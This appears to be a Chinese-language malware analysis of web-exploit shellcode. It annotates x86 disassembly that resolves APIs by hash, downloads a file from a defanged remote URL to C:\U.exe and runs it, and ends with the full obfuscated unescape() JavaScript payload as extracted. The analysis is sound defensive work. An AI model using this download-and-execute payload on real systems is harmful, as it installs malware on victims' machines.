1、shellcode初始化代码

代码:
00401000 > $  8D85 70FEFFFF lea     eax, dword ptr [ebp-190]         ;  shellcode initialization code: eax -> WSAData buffer on the stack
00401006   .  50            push    eax                              ; /pWSAData
00401007   .  68 01010000   push    101                              ; |RequestedVersion = 101 (1.1.) -- Winsock 1.1 requested
0040100C   .  FF15 18504000 call    dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup -- called through an import thunk, unlike the hash-resolved calls in the shellcode below; presumably the analyst's loader/harness rather than the position-independent payload itself. No direct socket use appears in the listed shellcode (it downloads via URLDownloadToFileA).
2、获取函数地址的运算部分
代码:
00401020   .  EB 54         jmp     short 00401076            ; skip over the API-resolver routine below to the entry code at 00401076 (not in this excerpt)
00401022  /$  8B75 3C       mov     esi, dword ptr [ebp+3C]                      ; resolver entry: ebp = module base (set by the caller), edi = wanted hash; [base+3C] = e_lfanew (PE header RVA)
00401025  |.  8B7435 78     mov     esi, dword ptr [ebp+esi+78]                  ; PE header + 78: export directory RVA (DataDirectory[0])
00401029  |.  03F5          add     esi, ebp                                     ; RVA -> VA of the export directory
0040102B  |.  56            push    esi                                          ; save the export directory pointer for the tail of the routine (not shown here)
0040102C  |.  8B76 20       mov     esi, dword ptr [esi+20]                      ; export dir + 20: AddressOfNames RVA
0040102F  |.  03F5          add     esi, ebp                                     ; RVA -> VA; esi walks the name-pointer table
00401031  |.  33C9          xor     ecx, ecx                                     ; ecx = name index, starts at -1 so the first inc yields 0
00401033  |.  49            dec     ecx
00401034  |>  41            /inc     ecx                                         ; outer loop: next exported name
00401035  |.  AD            |lods    dword ptr [esi]                             ; eax = RVA of the name string; esi advances to the next entry
00401036  |.  33DB          |xor     ebx, ebx                                    ; ebx = running hash of this name (this is the function-lookup arithmetic)
00401038  |>  36:0FBE1428   |/movsx   edx, byte ptr ss:[eax+ebp]                 ; inner loop: edx = next character of the name (sign-extended)
0040103D  |.  38F2          ||cmp     dl, dh                                     ; dh is 0 after movsx of an ASCII byte, so this tests for the NUL terminator
0040103F  |.  74 08         ||je      short 00401049
00401041  |.  C1CB 0D       ||ror     ebx, 0D                                    ; hash step: rotate right by 13 ...
00401044  |.  03DA          ||add     ebx, edx                                   ; ... then add the character
00401046  |.  40            ||inc     eax                                        ; next character
00401047  |.^ EB EF         |\jmp     short 00401038
00401049  |>  3BDF          |cmp     ebx, edi                                    ; compare the name's hash with the wanted hash in edi
0040104B  |.^ 75 E7         \jnz     short 00401034                              ; no match -> try the next name; on a match the routine continues past this excerpt and returns with eax = function address (see the call eax sites below)
3、shellcode运行的整个流程:最终通过hxxp://qq.18i16.net/exe1/lzz.css下载指定的病毒到用户计算机上执行。通过分析,下载下来的为机器狗的最新变种,美其名曰“牛”。
代码:
00401090   .  8B40 3C       mov     eax, dword ptr [eax+3C]          ;  last step of locating the module base (the preceding lookup is not in this excerpt)
00401093   >  95            xchg    eax, ebp                         ;  ebp = module base for the resolver at 00401022 (kernel32, per the LoadLibraryA lookup that follows)
00401094   .  BF 8E4E0EEC   mov     edi, EC0E4E8E                    ;  edi = hash of LoadLibraryA
00401099   .  E8 84FFFFFF   call    00401022                         ;  resolve -> eax = kernel32.LoadLibraryA
0040109E   .  83EC 04       sub     esp, 4                           ;  reuse the slot holding the return address just popped by the resolver (0040109E) ...
004010A1   .  832C24 3C     sub     dword ptr [esp], 3C              ;  ... 0040109E - 3C = 00401062: position-independent pointer to the embedded "urlmon.dll" string, passed as lpLibFileName
004010A5   .  FFD0          call    eax                              ;  LoadLibraryA("urlmon.dll") -> eax = urlmon base
004010A7   .  95            xchg    eax, ebp                         ;  ebp = urlmon base (resolver now searches urlmon's exports); eax = kernel32 base
004010A8   .  50            push    eax                              ;  save the kernel32 base for later
004010A9   .  BF 361A2F70   mov     edi, 702F1A36                    ;  edi = hash of URLDownloadToFileA
004010AE   .  E8 6FFFFFFF   call    00401022                         ;  resolve -> eax = urlmon.URLDownloadToFileA
004010B3   .  8B5424 FC     mov     edx, dword ptr [esp-4]           ;  read the return address (004010B3) the resolver's ret left just below esp
004010B7   .  8D52 BA       lea     edx, dword ptr [edx-46]          ;  004010B3 - 46 = 0040106D: pointer to the embedded local file path "C:\U.exe"
004010BA   .  33DB          xor     ebx, ebx
004010BC   .  53            push    ebx                              ;  lpfnCB = NULL
004010BD   .  53            push    ebx                              ;  dwReserved = 0
004010BE   .  52            push    edx                              ;  szFileName = "C:\U.exe"
004010BF   .  EB 24         jmp     short 004010E5                   ;  detour: the call at 004010E5 pushes the address of the URL string as szURL
004010C1   $  53            push    ebx                              ;  pCaller = NULL
004010C2   .  FFD0          call    eax                              ;  URLDownloadToFileA(NULL, "hxxp://qq.18i16.net/exe1/lzz.css", "C:\U.exe", 0, NULL); stdcall removes the 5 arguments
004010C4   .  5D            pop     ebp                              ;  restore the kernel32 base saved at 004010A8 so the resolver searches kernel32 again
004010C5   .  BF 98FE8A0E   mov     edi, 0E8AFE98                    ;  edi = hash of WinExec
004010CA   .  E8 53FFFFFF   call    00401022                         ;  resolve -> eax = kernel32.WinExec
004010CF   .  83EC 04       sub     esp, 4                           ;  same return-address trick as at 0040109E ...
004010D2   .  832C24 62     sub     dword ptr [esp], 62              ;  ... 004010CF - 62 = 0040106D: lpCmdLine = "C:\U.exe"
004010D6   .  FFD0          call    eax                              ;  WinExec("C:\U.exe", uCmdShow) runs the downloaded file; only one argument is pushed, so uCmdShow appears to come from whatever already sits on the stack
004010D8   .  BF 7ED8E273   mov     edi, 73E2D87E                    ;  edi = hash of ExitProcess
004010DD   .  E8 40FFFFFF   call    00401022                         ;  resolve -> eax = kernel32.ExitProcess
004010E2   .  52            push    edx                              ;  uExitCode = edx (still the "C:\U.exe" pointer; the value is incidental)
004010E3   .  FFD0          call    eax                              ;  ExitProcess: the host process terminates, so control never returns to the exploited application
004010E5   >  E8 D7FFFFFF   call    004010C1                         ;  pushes 004010EA, where the URL string bytes begin, as the szURL argument and enters the download/execute sequence
源代码:
代码:
// Obfuscated payload as found in the exploit page: the x86 shellcode analysed in the
// listings above, carried as a %u-escaped string and decoded at runtime with
// window.unescape. Reproduced exactly as extracted (the literal is wrapped across
// lines by the capture and broken into many concatenated fragments, e.g. "%u408"+"B").
// Embedded indicators sit as plain ASCII inside the blob: "urlmon.dll", the drop
// path C:\U.exe, and the download URL hxxp://qq.18i16.net/exe1/lzz.css at the tail.
var huoqiang=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%

u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%

u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%

uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%

u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%

u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%

uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%

u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%

u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%

u7074%u2f3a%u712f%u2e71%u3831%u3169%u2e36%u656e%u2f74%u7865"+"%u3165%u6c2f%u7a7a%u632e%u7373%u0000");